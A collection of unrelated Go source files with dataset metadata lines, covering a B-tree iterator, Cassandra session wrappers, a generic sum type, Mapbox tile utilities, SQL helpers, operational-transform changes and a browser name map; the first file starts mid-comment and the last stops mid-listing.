* {@code PipelineHelper}, which describes the upstream intermediate
* operations.
*
* @param helper the pipeline helper
* @param spliterator the source spliterator
* @return the result of the evaluation
*/
EvaluateSequential(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional
}
type TODOOperation struct {
class.Class
}
func (op *TODOOperation) GetOpFlags() int {
return 0
}
func (op *TODOOperation) EvaluateParallel(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional {
c := op.GetDerivedElse(op).(Operation)
return c.EvaluateSequential(ctx, spliterator)
}
func (op *TODOOperation) EvaluateSequential(ctx context.Context, spliterator spliterator.Spliterator) optional.Optional {
panic(exception.NewIllegalStateException())
} | go/container/stream/op/terminal/op.go | 0.860677 | 0.431704 | op.go | starcoder |
package btree
import "github.com/xtmono/gods/containers"
func assertIteratorImplementation() {
var _ containers.ReverseIteratorWithKey = (*Iterator)(nil)
}
// Iterator holding the iterator's state
type Iterator struct {
tree *Tree
node *Node
entry *Entry
position position
}
type position byte
const (
begin, between, end position = 0, 1, 2
)
// Iterator returns a stateful iterator whose elements are key/value pairs.
func (tree *Tree) Iterator() Iterator {
return Iterator{tree: tree, node: nil, position: begin}
}
// Next moves the iterator to the next element and returns true if there was a next element in the container.
// If Next() returns true, then next element's key and value can be retrieved by Key() and Value().
// If Next() was called for the first time, then it will point the iterator to the first element if it exists.
// Modifies the state of the iterator.
func (iterator *Iterator) Next() bool {
// If already at end, go to end
if iterator.position == end {
goto end
}
// If at beginning, get the left-most entry in the tree
if iterator.position == begin {
left := iterator.tree.Left()
if left == nil {
goto end
}
iterator.node = left
iterator.entry = left.Entries[0]
goto between
}
{
// Find current entry position in current node
e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
// Try to go down to the child right of the current entry
if e+1 < len(iterator.node.Children) {
iterator.node = iterator.node.Children[e+1]
// Try to go down to the child left of the current node
for len(iterator.node.Children) > 0 {
iterator.node = iterator.node.Children[0]
}
// Return the left-most entry
iterator.entry = iterator.node.Entries[0]
goto between
}
// Above assures that we have reached a leaf node, so return the next entry in current node (if any)
if e+1 < len(iterator.node.Entries) {
iterator.entry = iterator.node.Entries[e+1]
goto between
}
}
// Reached leaf node and there are no entries to the right of the current entry, so go up to the parent
for iterator.node.Parent != nil {
iterator.node = iterator.node.Parent
// Find next entry position in current node (note: search returns the first equal or bigger than entry)
e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
// Check that there is a next entry position in current node
if e < len(iterator.node.Entries) {
iterator.entry = iterator.node.Entries[e]
goto between
}
}
end:
iterator.End()
return false
between:
iterator.position = between
return true
}
// Prev moves the iterator to the previous element and returns true if there was a previous element in the container.
// If Prev() returns true, then previous element's key and value can be retrieved by Key() and Value().
// Modifies the state of the iterator.
func (iterator *Iterator) Prev() bool {
// If already at beginning, go to begin
if iterator.position == begin {
goto begin
}
// If at end, get the right-most entry in the tree
if iterator.position == end {
right := iterator.tree.Right()
if right == nil {
goto begin
}
iterator.node = right
iterator.entry = right.Entries[len(right.Entries)-1]
goto between
}
{
// Find current entry position in current node
e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
// Try to go down to the child left of the current entry
if e < len(iterator.node.Children) {
iterator.node = iterator.node.Children[e]
// Try to go down to the child right of the current node
for len(iterator.node.Children) > 0 {
iterator.node = iterator.node.Children[len(iterator.node.Children)-1]
}
// Return the right-most entry
iterator.entry = iterator.node.Entries[len(iterator.node.Entries)-1]
goto between
}
// Above assures that we have reached a leaf node, so return the previous entry in current node (if any)
if e-1 >= 0 {
iterator.entry = iterator.node.Entries[e-1]
goto between
}
}
// Reached leaf node and there are no entries to the left of the current entry, so go up to the parent
for iterator.node.Parent != nil {
iterator.node = iterator.node.Parent
// Find previous entry position in current node (note: search returns the first equal or bigger than entry)
e, _ := iterator.tree.search(iterator.node, iterator.entry.Key)
// Check that there is a previous entry position in current node
if e-1 >= 0 {
iterator.entry = iterator.node.Entries[e-1]
goto between
}
}
begin:
iterator.Begin()
return false
between:
iterator.position = between
return true
}
// Value returns the current element's value.
// Does not modify the state of the iterator.
func (iterator *Iterator) Value() interface{} {
return iterator.entry.Value
}
// Key returns the current element's key.
// Does not modify the state of the iterator.
func (iterator *Iterator) Key() interface{} {
return iterator.entry.Key
}
// Begin resets the iterator to its initial state (one-before-first)
// Call Next() to fetch the first element if any.
func (iterator *Iterator) Begin() {
iterator.node = nil
iterator.position = begin
iterator.entry = nil
}
// End moves the iterator past the last element (one-past-the-end).
// Call Prev() to fetch the last element if any.
func (iterator *Iterator) End() {
iterator.node = nil
iterator.position = end
iterator.entry = nil
}
// First moves the iterator to the first element and returns true if there was a first element in the container.
// If First() returns true, then first element's key and value can be retrieved by Key() and Value().
// Modifies the state of the iterator
func (iterator *Iterator) First() bool {
iterator.Begin()
return iterator.Next()
}
// Last moves the iterator to the last element and returns true if there was a last element in the container.
// If Last() returns true, then last element's key and value can be retrieved by Key() and Value().
// Modifies the state of the iterator.
func (iterator *Iterator) Last() bool {
iterator.End()
return iterator.Prev()
} | trees/btree/iterator.go | 0.755096 | 0.431045 | iterator.go | starcoder |
package validation
import (
validation "github.com/Randyshu2018/fabric/core/handlers/validation/api"
)
// State defines interaction with the world state
type State interface {
// GetStateMultipleKeys gets the values for multiple keys in a single call
GetStateMultipleKeys(namespace string, keys []string) ([][]byte, error)
// GetStateRangeScanIterator returns an iterator that contains all the key-values between given key ranges.
// startKey is included in the results and endKey is excluded. An empty startKey refers to the first available key
// and an empty endKey refers to the last available key. For scanning all the keys, both the startKey and the endKey
// can be supplied as empty strings. However, a full scan should be used judiciously for performance reasons.
// The returned ResultsIterator contains results of type *KV which is defined in fabric-protos/ledger/queryresult.
GetStateRangeScanIterator(namespace string, startKey string, endKey string) (ResultsIterator, error)
// GetStateMetadata returns the metadata for given namespace and key
GetStateMetadata(namespace, key string) (map[string][]byte, error)
// GetPrivateDataMetadataByHash gets the metadata of a private data item identified by a tuple <namespace, collection, keyhash>
GetPrivateDataMetadataByHash(namespace, collection string, keyhash []byte) (map[string][]byte, error)
// Done releases resources occupied by the State
Done()
}
// StateFetcher retrieves an instance of a state
type StateFetcher interface {
validation.Dependency
// FetchState fetches state
FetchState() (State, error)
}
// ResultsIterator - an iterator for query result set
type ResultsIterator interface {
// Next returns the next item in the result set. The `QueryResult` is expected to be nil when
// the iterator gets exhausted
Next() (QueryResult, error)
// Close releases resources occupied by the iterator
Close()
}
// QueryResult - a general interface for supporting different types of query results. Actual types differ for different queries
type QueryResult interface{} | core/handlers/validation/api/state/state.go | 0.594787 | 0.521837 | state.go | starcoder |
// Package run implements a custom change that applies to a sequence
// of array elements.
package run
import (
"github.com/dotchain/dot/changes"
"github.com/dotchain/dot/refs"
)
// Run implements a custom change type which applies a provided
// inner change to a run of items in an array. This is particularly
// useful for rich text operations
type Run struct {
Offset, Count int
changes.Change
}
// ApplyTo just converts the method into a set of path changes
func (r Run) ApplyTo(ctx changes.Context, v changes.Value) changes.Value {
for kk := r.Offset; kk < r.Offset+r.Count; kk++ {
v = v.Apply(ctx, changes.PathChange{Path: []interface{}{kk}, Change: r.Change})
}
return v
}
// Revert undoes the effect of the Run
func (r Run) Revert() changes.Change {
if r.Change == nil {
return nil
}
return Run{r.Offset, r.Count, r.Change.Revert()}
}
// Merge implements the main merge routing for a change
func (r Run) Merge(o changes.Change) (changes.Change, changes.Change) {
return r.merge(o, false)
}
// ReverseMerge is like Merge except the args and receiver are
// inverted. Basically if someone calls "ch.Merge(r)" and ch does not
// know how to implement merge with r, it calls r.ReverseMerge(ch).
func (r Run) ReverseMerge(o changes.Change) (changes.Change, changes.Change) {
return r.merge(o, true)
}
// MergePath implements the method needed to work with refs.Merge
func (r Run) MergePath(p []interface{}) *refs.MergeResult {
idx := p[0].(int)
if idx < r.Offset || idx >= r.Offset+r.Count {
return &refs.MergeResult{P: p, Unaffected: r}
}
return refs.Merge(p[1:], r.Change).Prefix(p[:1])
}
func (r Run) merge(o changes.Change, reverse bool) (ox, rx changes.Change) {
if r.Change == nil {
return o, nil
}
switch o := o.(type) {
case nil:
return nil, r
case changes.Replace:
o.Before = o.Before.Apply(nil, r)
return o, nil
case changes.Splice:
return r.mergeSplice(o)
case changes.Move:
return r.mergeMove(o)
case Run:
return r.mergeRun(o, reverse)
case changes.PathChange:
return r.mergePathChange(o, reverse)
}
if reverse {
rx, ox = o.Merge(r)
} else {
rx, ox = o.(changes.Custom).ReverseMerge(r)
}
return ox, rx
}
func (r Run) mergeSplice(o changes.Splice) (changes.Change, changes.Change) {
oEnd := o.Offset + o.Before.Count()
switch {
case r.Offset >= oEnd:
r.Offset += o.After.Count() - o.Before.Count()
case r.Offset+r.Count <= o.Offset:
case r.Offset >= o.Offset && r.Offset+r.Count <= oEnd:
r.Offset -= o.Offset
o.Before = r.apply(nil, o.Before, r)
return o, nil
case r.Offset <= o.Offset && r.Offset+r.Count >= oEnd:
o.Before = r.apply(nil, o.Before, Run{0, o.Before.Count(), r.Change})
left := Run{r.Offset, o.Offset - r.Offset, r.Change}
right := Run{o.Offset + o.After.Count(), r.Offset + r.Count - oEnd, r.Change}
return o, changes.ChangeSet{left, right}
case r.Offset < o.Offset && o.Offset < r.Offset+r.Count:
o.Before = r.apply(nil, o.Before, Run{0, r.Offset + r.Count - o.Offset, r.Change})
r.Count = o.Offset - r.Offset
case r.Offset > o.Offset && r.Offset < oEnd:
o.Before = r.apply(nil, o.Before, Run{r.Offset - o.Offset, oEnd - r.Offset, r.Change})
r.Count = r.Offset + r.Count - oEnd
r.Offset = o.Offset + o.After.Count()
}
return o, r
}
func (r Run) apply(ctx changes.Context, v changes.Value, c changes.Change) changes.Collection {
return v.Apply(ctx, c).(changes.Collection)
}
func (r Run) mergeMove(o changes.Move) (changes.Change, changes.Change) {
rEnd, oEnd := r.Offset+r.Count, o.Offset+o.Count
oDest := oEnd + o.Distance
if o.Distance < 0 {
oDest = o.Offset + o.Distance
}
switch {
case rEnd <= o.Offset && rEnd <= oDest:
case r.Offset >= oDest && rEnd <= o.Offset:
r.Offset += o.Count
case r.Offset >= o.Offset && rEnd <= oEnd:
r.Offset += o.Distance
case r.Offset >= oEnd && rEnd <= oDest:
r.Offset -= o.Count
case r.Offset >= oEnd && rEnd >= oDest:
default:
return r.split3(oDest, o)
}
return o, r
}
func (r Run) mergeRun(o Run, reverse bool) (changes.Change, changes.Change) {
rEnd, oEnd := r.Offset+r.Count, o.Offset+o.Count
switch {
case rEnd <= o.Offset || oEnd <= r.Offset:
return o, r
case r.Offset == o.Offset && rEnd == oEnd:
var ox, rx changes.Change
if reverse && o.Change != nil {
rx, ox = o.Change.Merge(r.Change)
} else {
ox, rx = r.Change.Merge(o.Change)
}
return Run{o.Offset, o.Count, ox}, Run{r.Offset, r.Count, rx}
}
left := r.splitRuns([]changes.Change{r}, o.Offset)
left = r.splitRuns(left, o.Offset+o.Count)
right := r.splitRuns([]changes.Change{o}, r.Offset)
right = r.splitRuns(right, r.Offset+r.Count)
lx := changes.ChangeSet(left)
rx := changes.ChangeSet(right)
if reverse {
x, y := rx.Merge(lx)
return y, x
}
return lx.Merge(rx)
}
func (r Run) mergePathChange(o changes.PathChange, reverse bool) (changes.Change, changes.Change) {
if len(o.Path) == 0 {
return r.merge(o.Change, reverse)
}
idx := o.Path[0].(int)
if idx < r.Offset || idx >= r.Offset+r.Count {
return o, r
}
var left, right changes.Change
if idx > r.Offset {
left = Run{r.Offset, idx - r.Offset, r.Change}
}
if idx+1 < r.Offset+r.Count {
right = Run{idx + 1, r.Offset + r.Count - idx - 1, r.Change}
}
other := changes.PathChange{Path: o.Path[1:], Change: o.Change}
var ox, mid changes.Change
if reverse {
mid, ox = other.Merge(r.Change)
} else {
ox, mid = r.Change.Merge(other)
}
ox = changes.PathChange{Path: o.Path[:1], Change: ox}
mid = changes.PathChange{Path: o.Path[:1], Change: mid}
return ox, changes.ChangeSet{left, mid, right}
}
func (r Run) splitRuns(runs []changes.Change, idx int) []changes.Change {
result := make([]changes.Change, 0, len(runs)+1)
for _, rx := range runs {
run := rx.(Run)
if idx > run.Offset && idx < run.Offset+run.Count {
left := Run{run.Offset, idx - run.Offset, run.Change}
right := Run{idx, run.Count + run.Offset - idx, run.Change}
result = append(result, left, right)
} else {
result = append(result, run)
}
}
return result
}
func (r Run) split3(dest int, o changes.Move) (changes.Change, changes.Change) {
c := r.splitRuns([]changes.Change{r}, dest)
c = r.splitRuns(c, o.Offset)
c = r.splitRuns(c, o.Offset+o.Count)
return changes.ChangeSet(c).Merge(o)
} | changes/run/run.go | 0.794505 | 0.490724 | run.go | starcoder |
package peplos
import (
"fmt"
"github.com/gocql/gocql"
"github.com/maraino/go-mock"
)
func metadata(s *gocql.Session, keyspace string) (*gocql.KeyspaceMetadata, error) {
var m, err = s.KeyspaceMetadata(keyspace)
if err != nil {
return nil, err
}
if !m.DurableWrites && m.Name == keyspace && m.StrategyClass == "" && len(m.StrategyOptions) == 0 && len(m.Tables) == 0 {
return nil, fmt.Errorf("gockle: keyspace %v invalid", keyspace)
}
return m, nil
}
// Session is a Cassandra connection. The Query methods run CQL queries. The
// Columns and Tables methods provide simple metadata.
type Session interface {
// Batch returns a new Batch for the Session.
Batch(kind BatchKind) Batch
// Close closes the Session.
Close()
// Columns returns a map from column names to types for keyspace and table.
// Schema changes during a session are not reflected; you must open a new
// Session to observe them.
Columns(keyspace, table string) (map[string]gocql.TypeInfo, error)
// Exec executes the query for statement and arguments.
Exec(statement string, arguments ...interface{}) error
// Scan executes the query for statement and arguments and puts the first
// result row in results.
Scan(statement string, results []interface{}, arguments ...interface{}) error
// ScanIterator executes the query for statement and arguments and returns an
// Iterator for the results.
ScanIterator(statement string, arguments ...interface{}) Iterator
// ScanMap executes the query for statement and arguments and puts the first
// result row in results.
ScanMap(statement string, results map[string]interface{}, arguments ...interface{}) error
// ScanMapSlice executes the query for statement and arguments and returns all
// the result rows.
ScanMapSlice(statement string, arguments ...interface{}) ([]map[string]interface{}, error)
// ScanMapTx executes the query for statement and arguments as a lightweight
// transaction. If the query is not applied, it puts the current values for the
// conditional columns in results. It returns whether the query is applied.
ScanMapTx(statement string, results map[string]interface{}, arguments ...interface{}) (bool, error)
// Tables returns the table names for keyspace. Schema changes during a session
// are not reflected; you must open a new Session to observe them.
Tables(keyspace string) ([]string, error)
}
var (
_ Session = SessionMock{}
_ Session = session{}
)
// NewSession returns a new Session for s.
func NewSession(s *gocql.Session) Session {
return session{s: s}
}
// NewSimpleSession returns a new Session for hosts. It uses native protocol
// version 4.
func NewSimpleSession(hosts ...string) (Session, error) {
var c = gocql.NewCluster(hosts...)
c.ProtoVersion = 4
var s, err = c.CreateSession()
if err != nil {
return nil, err
}
return session{s: s}, nil
}
// SessionMock is a mock Session. See github.com/maraino/go-mock.
type SessionMock struct {
mock.Mock
}
// Batch implements Session.
func (m SessionMock) Batch(kind BatchKind) Batch {
return m.Called(kind).Get(0).(Batch)
}
// Close implements Session.
func (m SessionMock) Close() {
m.Called()
}
// Columns implements Session.
func (m SessionMock) Columns(keyspace, table string) (map[string]gocql.TypeInfo, error) {
var r = m.Called(keyspace, table)
return r.Get(0).(map[string]gocql.TypeInfo), r.Error(1)
}
// Exec implements Session.
func (m SessionMock) Exec(statement string, arguments ...interface{}) error {
return m.Called(statement, arguments).Error(0)
}
// Scan implements Session.
func (m SessionMock) Scan(statement string, results []interface{}, arguments ...interface{}) error {
return m.Called(statement, results, arguments).Error(0)
}
// ScanIterator implements Session.
func (m SessionMock) ScanIterator(statement string, arguments ...interface{}) Iterator {
return m.Called(statement, arguments).Get(0).(Iterator)
}
// ScanMap implements Session.
func (m SessionMock) ScanMap(statement string, results map[string]interface{}, arguments ...interface{}) error {
return m.Called(statement, results, arguments).Error(0)
}
// ScanMapSlice implements Session.
func (m SessionMock) ScanMapSlice(statement string, arguments ...interface{}) ([]map[string]interface{}, error) {
var r = m.Called(statement, arguments)
return r.Get(0).([]map[string]interface{}), r.Error(1)
}
// ScanMapTx implements Session.
func (m SessionMock) ScanMapTx(statement string, results map[string]interface{}, arguments ...interface{}) (bool, error) {
var r = m.Called(statement, results, arguments)
return r.Bool(0), r.Error(1)
}
// Tables implements Session.
func (m SessionMock) Tables(keyspace string) ([]string, error) {
var r = m.Called(keyspace)
return r.Get(0).([]string), r.Error(1)
}
type session struct {
s *gocql.Session
}
func (s session) Batch(kind BatchKind) Batch {
return batch{b: s.s.NewBatch(gocql.BatchType(kind)), s: s.s}
}
func (s session) Close() {
s.s.Close()
}
func (s session) Columns(keyspace, table string) (map[string]gocql.TypeInfo, error) {
var m, err = metadata(s.s, keyspace)
if err != nil {
return nil, err
}
var t, ok = m.Tables[table]
if !ok {
return nil, fmt.Errorf("gockle: table %v.%v invalid", keyspace, table)
}
var types = map[string]gocql.TypeInfo{}
for n, c := range t.Columns {
types[n] = c.Type
}
return types, nil
}
func (s session) Exec(statement string, arguments ...interface{}) error {
return s.s.Query(statement, arguments...).Exec()
}
func (s session) Scan(statement string, results []interface{}, arguments ...interface{}) error {
return s.s.Query(statement, arguments...).Scan(results...)
}
func (s session) ScanIterator(statement string, arguments ...interface{}) Iterator {
return iterator{i: s.s.Query(statement, arguments...).Iter()}
}
func (s session) ScanMap(statement string, results map[string]interface{}, arguments ...interface{}) error {
return s.s.Query(statement, arguments...).MapScan(results)
}
func (s session) ScanMapSlice(statement string, arguments ...interface{}) ([]map[string]interface{}, error) {
return s.s.Query(statement, arguments...).Iter().SliceMap()
}
func (s session) ScanMapTx(statement string, results map[string]interface{}, arguments ...interface{}) (bool, error) {
return s.s.Query(statement, arguments...).MapScanCAS(results)
}
func (s session) Tables(keyspace string) ([]string, error) {
var m, err = metadata(s.s, keyspace)
if err != nil {
return nil, err
}
var ts []string
for t := range m.Tables {
ts = append(ts, t)
}
return ts, nil
} | session.go | 0.732687 | 0.403273 | session.go | starcoder |
package maps
import (
"bufio"
"bytes"
"image"
"image/draw"
"image/jpeg"
"image/png"
"io/ioutil"
"os"
"github.com/JayBusch/go-mapbox/lib/base"
)
// LocationToTileID converts a lat/lon location into a tile ID
func LocationToTileID(loc base.Location, level uint64) (uint64, uint64) {
return MercatorLocationToTileID(loc.Latitude, loc.Longitude, level, 256)
}
// TileIDToLocation converts a tile ID to a lat/lon location
func TileIDToLocation(x, y float64, level uint64) base.Location {
lat, lng := MercatorPixelToLocation(x, y, level, 256)
return base.Location{
Latitude: lat,
Longitude: lng,
}
}
// WrapTileID wraps tile IDs by level for api requests
// eg. Tile (X:16, Y:10, level:4 ) will become (X:0, Y:10, level:4)
func WrapTileID(x, y, level uint64) (uint64, uint64) {
// Limit to 2^n tile range for a given level
x = x % (2 << (level - 1))
y = y % (2 << (level - 1))
return x, y
}
// GetEnclosingTileIDs fetches a pair of tile IDs enclosing the provided pair of points
func GetEnclosingTileIDs(a, b base.Location, level uint64) (uint64, uint64, uint64, uint64) {
aX, aY := LocationToTileID(a, level)
bX, bY := LocationToTileID(b, level)
var xStart, xEnd, yStart, yEnd uint64
if bX >= aX {
xStart = aX
xEnd = bX
} else {
xStart = bX
xEnd = aX
}
if bY >= aY {
yStart = aY
yEnd = bY
} else {
yStart = bY
yEnd = aY
}
return xStart, yStart, xEnd, yEnd
}
// StitchTiles combines a 2d array of image tiles into a single larger image
// Note that all images must have the same dimensions for this to work
func StitchTiles(images [][]Tile) Tile {
imgX := images[0][0].Image.Bounds().Dx()
imgY := images[0][0].Image.Bounds().Dy()
xSize := imgX * len(images[0])
ySize := imgY * len(images)
stitched := image.NewRGBA(image.Rect(0, 0, xSize, ySize))
for y, row := range images {
for x, img := range row {
sp := image.Point{0, 0}
bounds := image.Rect(x*imgX, y*imgY, (x+1)*imgX, (y+1)*imgY)
draw.Draw(stitched, bounds, img, sp, draw.Over)
}
}
return NewTile(images[0][0].X, images[0][0].Y, images[0][0].Level, images[0][0].Size, stitched)
}
// LoadImage loads an image from a file
func LoadImage(file string) (image.Image, *image.Config, error) {
f, err := os.Open(file)
if err != nil {
return nil, nil, err
}
r := bufio.NewReader(f)
data, err := ioutil.ReadAll(r)
f.Close()
cfg := image.Config{}
cfg, _, err = image.DecodeConfig(bytes.NewReader(data))
if err != nil {
f.Close()
return nil, nil, err
}
img, _, err := image.Decode(bytes.NewReader(data))
if err != nil {
f.Close()
return nil, nil, err
}
return img, &cfg, nil
}
// SaveImageJPG writes an image instance to a jpg file
func SaveImageJPG(img image.Image, file string) error {
f, err := os.Create(file)
if err != nil {
return err
}
w := bufio.NewWriter(f)
err = jpeg.Encode(w, img, nil)
if err != nil {
return err
}
err = w.Flush()
if err != nil {
return err
}
f.Close()
return nil
}
// SaveImagePNG writes an image instance to a png file
func SaveImagePNG(img image.Image, file string) error {
f, err := os.Create(file)
if err != nil {
return err
}
w := bufio.NewWriter(f)
err = png.Encode(w, img)
if err != nil {
return err
}
err = w.Flush()
if err != nil {
return err
}
f.Close()
return nil
}
// PixelToHeight Converts a pixel to a height value for mapbox terrain tiles
// Equation from https://www.mapbox.com/blog/terrain-rgb/
func PixelToHeight(r, g, b uint8) float64 {
R, G, B := float64(r), float64(g), float64(b)
return -10000 + ((R*256*256 + G*256 + B) * 0.1)
}
func HeightToPixel(alt float64) (uint8, uint8, uint8) {
increments := int((alt + 10000) / 0.1)
b := uint8((increments >> 0) % 0xFF)
g := uint8((increments >> 8) % 0xFF)
r := uint8((increments >> 16) % 0xFF)
return r, g, b
} | lib/maps/util.go | 0.746231 | 0.459501 | util.go | starcoder |
package query
import (
"database/sql"
"fmt"
"strings"
)
// SelectStrings executes a statement which must yield rows with a single string
// column. It returns the list of column values.
func SelectStrings(tx *sql.Tx, query string, args ...any) ([]string, error) {
values := []string{}
scan := func(rows *sql.Rows) error {
var value string
err := rows.Scan(&value)
if err != nil {
return err
}
values = append(values, value)
return nil
}
err := scanSingleColumn(tx, query, args, "TEXT", scan)
if err != nil {
return nil, err
}
return values, nil
}
// SelectIntegers executes a statement which must yield rows with a single integer
// column. It returns the list of column values.
func SelectIntegers(tx *sql.Tx, query string, args ...any) ([]int, error) {
values := []int{}
scan := func(rows *sql.Rows) error {
var value int
err := rows.Scan(&value)
if err != nil {
return err
}
values = append(values, value)
return nil
}
err := scanSingleColumn(tx, query, args, "INTEGER", scan)
if err != nil {
return nil, err
}
return values, nil
}
// InsertStrings inserts a new row for each of the given strings, using the
// given insert statement template, which must define exactly one insertion
// column and one substitution placeholder for the values. For example:
// InsertStrings(tx, "INSERT INTO foo(name) VALUES %s", []string{"bar"}).
func InsertStrings(tx *sql.Tx, stmt string, values []string) error {
n := len(values)
if n == 0 {
return nil
}
params := make([]string, n)
args := make([]any, n)
for i, value := range values {
params[i] = "(?)"
args[i] = value
}
stmt = fmt.Sprintf(stmt, strings.Join(params, ", "))
_, err := tx.Exec(stmt, args...)
return err
}
// Execute the given query and ensure that it yields rows with a single column
// of the given database type. For every row yielded, execute the given
// scanner.
func scanSingleColumn(tx *sql.Tx, query string, args []any, typeName string, scan scanFunc) error {
rows, err := tx.Query(query, args...)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
err := scan(rows)
if err != nil {
return err
}
}
err = rows.Err()
if err != nil {
return err
}
return nil
}
// Function to scan a single row.
type scanFunc func(*sql.Rows) error | lxd/db/query/slices.go | 0.70069 | 0.508666 | slices.go | starcoder |
package st3
// A sum type which can have 3 different types.
type SumType3[T0, T1, T2 any] struct {
which uint8
val0 T0
val1 T1
val2 T2
}
// Creates a new SumType3 containing a value of type T0.
func New0[T0, T1, T2 any](value T0) SumType3[T0, T1, T2] {
return SumType3[T0, T1, T2]{
which: 0,
val0: value,
}
}
// Creates a new SumType3 containing a value of type T1.
func New1[T0, T1, T2 any](value T1) SumType3[T0, T1, T2] {
return SumType3[T0, T1, T2]{
which: 1,
val1: value,
}
}
// Creates a new SumType3 containing a value of type T2.
func New2[T0, T1, T2 any](value T2) SumType3[T0, T1, T2] {
return SumType3[T0, T1, T2]{
which: 2,
val2: value,
}
}
// Returns the index of the currently stored type.
func (st *SumType3[T0, T1, T2]) Which() uint8 {
return st.which
}
// Tells whether the stored value is of type T0.
func (st *SumType3[T0, T1, T2]) Has0() bool {
return st.which == 0
}
// Tells whether the stored value is of type T1.
func (st *SumType3[T0, T1, T2]) Has1() bool {
return st.which == 1
}
// Tells whether the stored value is of type T2.
func (st *SumType3[T0, T1, T2]) Has2() bool {
return st.which == 2
}
// If the stored value is of type T0, returns it and true; otherwise, returns a
// default value and false.
func (st *SumType3[T0, T1, T2]) Get0() (T0, bool) {
if st.which != 0 {
var def0 T0
return def0, false
}
return st.val0, true
}
// If the stored value is of type T1, returns it and true; otherwise, returns a
// default value and false.
func (st *SumType3[T0, T1, T2]) Get1() (T1, bool) {
if st.which != 1 {
var def1 T1
return def1, false
}
return st.val1, true
}
// If the stored value is of type T2, returns it and true; otherwise, returns a
// default value and false.
func (st *SumType3[T0, T1, T2]) Get2() (T2, bool) {
if st.which != 2 {
var def2 T2
return def2, false
}
return st.val2, true
}
// Calls the function according to the stored value; the other functions won't
// be called. This is equivalent to an exhaustive pattern matching.
func (st *SumType3[T0, T1, T2]) Match(
case0 func(value T0),
case1 func(value T1),
case2 func(value T2)) {
switch st.which {
case 0:
case0(st.val0)
case 1:
case1(st.val1)
case 2:
case2(st.val2)
}
} | st3/sumtype3.go | 0.571049 | 0.447702 | sumtype3.go | starcoder |
package client
import (
"path/filepath"
gover "github.com/mcuadros/go-version"
. "github.com/vtomar10/devicedetector/parser"
)
// Known browsers mapped to their internal short codes
var availableBrowsers = map[string]string{
`1B`: `115 Browser`,
`2B`: `2345 Browser`,
`36`: `360 Phone Browser`,
`3B`: `360 Browser`,
`AA`: `Avant Browser`,
`AB`: `ABrowse`,
`AF`: `ANT Fresco`,
`AG`: `ANTGalio`,
`AL`: `Aloha Browser`,
`AH`: `Aloha Browser Lite`,
`AM`: `Amaya`,
`AO`: `Amigo`,
`AN`: `Android Browser`,
`AE`: `AOL Desktop`,
`AD`: `AOL Shield`,
`AR`: `Arora`,
`AX`: `Arctic Fox`,
`AV`: `Amiga Voyager`,
`AW`: `Amiga Aweb`,
`A0`: `Atom`,
`AT`: `Atomic Web Browser`,
`AS`: `Avast Secure Browser`,
`VG`: `AVG Secure Browser`,
`BA`: `Beaker Browser`,
`BM`: `Beamrise`,
`BB`: `BlackBerry Browser`,
`BD`: `Baidu Browser`,
`BS`: `Baidu Spark`,
`BI`: `Basilisk`,
`BE`: `Beonex`,
`BH`: `BlackHawk`,
`BJ`: `Bunjalloo`,
`BL`: `B-Line`,
`BR`: `Brave`,
`BK`: `BriskBard`,
`BX`: `BrowseX`,
`CA`: `Camino`,
`CL`: `CCleaner`,
`C0`: `Centaury`,
`CC`: `Coc Coc`,
`C2`: `Colibri`,
`CD`: `Comodo Dragon`,
`C1`: `Coast`,
`CX`: `Charon`,
`CE`: `CM Browser`,
`CF`: `Chrome Frame`,
`HC`: `Headless Chrome`,
`CH`: `Chrome`,
`CI`: `Chrome Mobile iOS`,
`CK`: `Conkeror`,
`CM`: `Chrome Mobile`,
`CN`: `CoolNovo`,
`CO`: `CometBird`,
`CB`: `COS Browser`,
`CP`: `ChromePlus`,
`CR`: `Chromium`,
`CY`: `Cyberfox`,
`CS`: `Cheshire`,
`CT`: `Crusta`,
`CU`: `Cunaguaro`,
`CV`: `Chrome Webview`,
`DB`: `dbrowser`,
`DE`: `Deepnet Explorer`,
`DT`: `Delta Browser`,
`DF`: `Dolphin`,
`DO`: `Dorado`,
`DL`: `Dooble`,
`DI`: `Dillo`,
`DD`: `DuckDuckGo Privacy Browser`,
`EC`: `Ecosia`,
`EI`: `Epic`,
`EL`: `Elinks`,
`EB`: `Element Browser`,
`EE`: `Elements Browser`,
`EZ`: `eZ Browser`,
`EU`: `EUI Browser`,
`EP`: `GNOME Web`,
`ES`: `Espial TV Browser`,
`FA`: `Falkon`,
`FX`: `Faux Browser`,
`F1`: `Firefox Mobile iOS`,
`FB`: `Firebird`,
`FD`: `Fluid`,
`FE`: `Fennec`,
`FF`: `Firefox`,
`FK`: `Firefox Focus`,
`FY`: `Firefox Reality`,
`FR`: `Firefox Rocket`,
`FL`: `Flock`,
`FM`: `Firefox Mobile`,
`FW`: `Fireweb`,
`FN`: `Fireweb Navigator`,
`FU`: `FreeU`,
`GA`: `Galeon`,
`GB`: `Glass Browser`,
`GE`: `Google Earth`,
`HA`: `Hawk Turbo Browser`,
`HO`: `hola! Browser`,
`HJ`: `HotJava`,
`HU`: `Huawei Browser`,
`IB`: `IBrowse`,
`IC`: `iCab`,
`I2`: `iCab Mobile`,
`I1`: `Iridium`,
`I3`: `Iron Mobile`,
`I4`: `IceCat`,
`ID`: `IceDragon`,
`IV`: `Isivioo`,
`IW`: `Iceweasel`,
`IE`: `Internet Explorer`,
`IM`: `IE Mobile`,
`IR`: `Iron`,
`JS`: `Jasmine`,
`JI`: `Jig Browser`,
`JP`: `Jig Browser Plus`,
`JO`: `Jio Browser`,
`KB`: `K.Browser`,
`KI`: `Kindle Browser`,
`KM`: `K-meleon`,
`KO`: `Konqueror`,
`KP`: `Kapiko`,
`KN`: `Kinza`,
`KW`: `Kiwi`,
`KY`: `Kylo`,
`KZ`: `Kazehakase`,
`LB`: `Cheetah Browser`,
`LF`: `LieBaoFast`,
`LG`: `LG Browser`,
`LH`: `Light`,
`LI`: `Links`,
`LO`: `Lovense Browser`,
`LU`: `LuaKit`,
`LL`: `Lulumi`,
`LS`: `Lunascape`,
`LN`: `Lunascape Lite`,
`LX`: `Lynx`,
`M1`: `mCent`,
`MB`: `MicroB`,
`MC`: `NCSA Mosaic`,
`MZ`: `Meizu Browser`,
`ME`: `Mercury`,
`MF`: `Mobile Safari`,
`MI`: `Midori`,
`MO`: `Mobicip`,
